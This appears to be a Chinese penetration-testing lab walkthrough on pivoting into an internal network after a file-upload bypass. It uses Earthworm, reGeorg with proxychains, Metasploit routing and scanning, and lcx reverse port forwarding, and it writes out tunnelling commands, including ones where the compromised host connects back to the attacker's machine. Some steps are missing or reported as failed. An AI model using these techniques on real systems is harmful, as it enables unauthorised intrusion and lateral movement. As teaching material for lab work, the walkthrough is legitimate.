有时候,经常在穿梭在行行种种的内网环境中,选择一个合适的代理方式十分重要,网上各式各样的代理工具和脚本也很多,本次实验环境尽可能的模拟真实的网络环境。本次实验分为两种情况:1.一种是被入侵的机器,能够反问道攻击机器(模拟现实中,肉鸡可以反弹的情况)。2:另外一种是被入侵的机器无法访问任何外网,只是被一个外网ip出口单纯的映射了一个端口出来。(可以想象一台公网vps机器映射了无数台web虚拟机)
实验环境(情况一)
攻击机器
kali一台 (10.211.55.3)
靶机
| O s | Service | Ip | WeakPoint |
|---|---|---|---|
| ubuntu | php,apache | 172.17.0.2 | upload |
| centos | discuz | 172.17.0.4 | weak password |
| debian | tomcat | 172.17.0.3 | s2-032 |
其中第一个服务映射出一个外网端口80,简而言之就是,现在攻击机可以访问http://10.211.55.6/upfile.php ,这是唯一一个可以被kali访问的服务。
上传导致的问题,直接伪造下Content-Type: image/jpeg就可以上传了。
首先利用reGeorg不成功,很明显由于权限和一些php阉割的原因,socket代理不上。通过自己写的webshell方式代理的话,也只能做一些简单的http协议的事情,很显然不符合我们的需求。 ###Earthworm 下载地址 好像长城宽带就下不了,如果下不了的话,请自行翻墙。这里肯定是正向代理的方式。 在webshell上执行
/ew -s ssocksd -l 2333
然后攻击机proxychains 应用就行了,记得在/etc/proxychains.conf后面加上socket5 10.211.55.6 2333,反正我测试失败了。
reGeorg
reGeorg使用也很简单,上传一个
然后本机
调用nmap扫描
nmap -sT -Pn -A -sI 192.168.1.101 192.168.1.108
只支持tcp和dns协议
攻击机
proxychains wget http://172.17.0.4/index.php
进一步拓展,reGeorg很方便,基本可以满足我们绝大部分的需求,可是我想充分利用好kali 的msf来渗透怎么办,这时候又无法反弹。
MSF
正向代理 先生成一个后门
通过菜刀上传到根目录,然后执行一下
很显然一个shell是无法满足我们的要求的,我们要把shell提升到meterpreter
sessions -u 5
查看ip
或者也可以
run get_local_subnets
添加路由
route add 172.17.0.2 255.255.0.0 7
查看下路由
route print
内网扫描搞起,2333
扫存活ip
auxiliary/scanner/ip/ipidseq
扫端口
use auxiliary/scanner/portscan/tcp
这里很容易就挂掉
后面就是类似的操作,可以参考文章
科普:msf内网渗透实例
开一个sock4代理 先添加路由在用socks4a模块,不过这玩意用着贼卡
use auxiliary/server/socks4a
查看jobs
jobs
总结
如果遇到这种流量只进不出的情况,也就是常说的正向代理,那么可以推荐用reGeorg+ proxychains的方式来加载网页或者运行一些python攻击脚本,然后用msf来对内网进行扫描或者域渗透
实验环境(情况二)
攻击机器
kali一台 (10.211.55.3)
靶机
| O s | Service | Ip | WeakPoint |
|---|---|---|---|
| ubuntu | php,apache | 172.17.0.2 | upload |
| centos | discuz | 172.17.0.4 | weak password |
| debian | tomcat | 172.17.0.3 | s2-032 |
情况二简而言之就是可以反弹出shell,可以理解成172.17.0.2这台机器可以访问我们攻击机(10.211.55.3) 这个情况就要好很多了,可以用的方法很多. Earthworm,lcx,ssok
lcx
先找到一台公网ip,说白了就是172.17.0.2可以ping通的机器,这里我们的攻击机是可以被肉鸡ping通的。
kali上
肉鸡上
/portmap -m 3 -h1 10.211.55.3 -p1 3349 -h2 172.17.0.4 -p2 80
我们再访问http://10.211.55.3:3348/forum.php
发现其实就是把172.17.0.4的discuz给映射到攻击的3348端口上来了。
Earthworm
由于Earthworm包含lcx的用法,也可以直接用它来转发 现在kali(10.211.55.3)机器上监听转发
/ew_for_linux64 -s lcx_listen -l 1234 -e 8888
肉鸡上运行
./ew -s lcx_slave -d 10.211.55.3 -e 1234 -f 172.17.0.3 -g 8080
是一个struts漏洞
MSF
反向代理
先生成一个反弹后门
msf设置一下
反弹成功
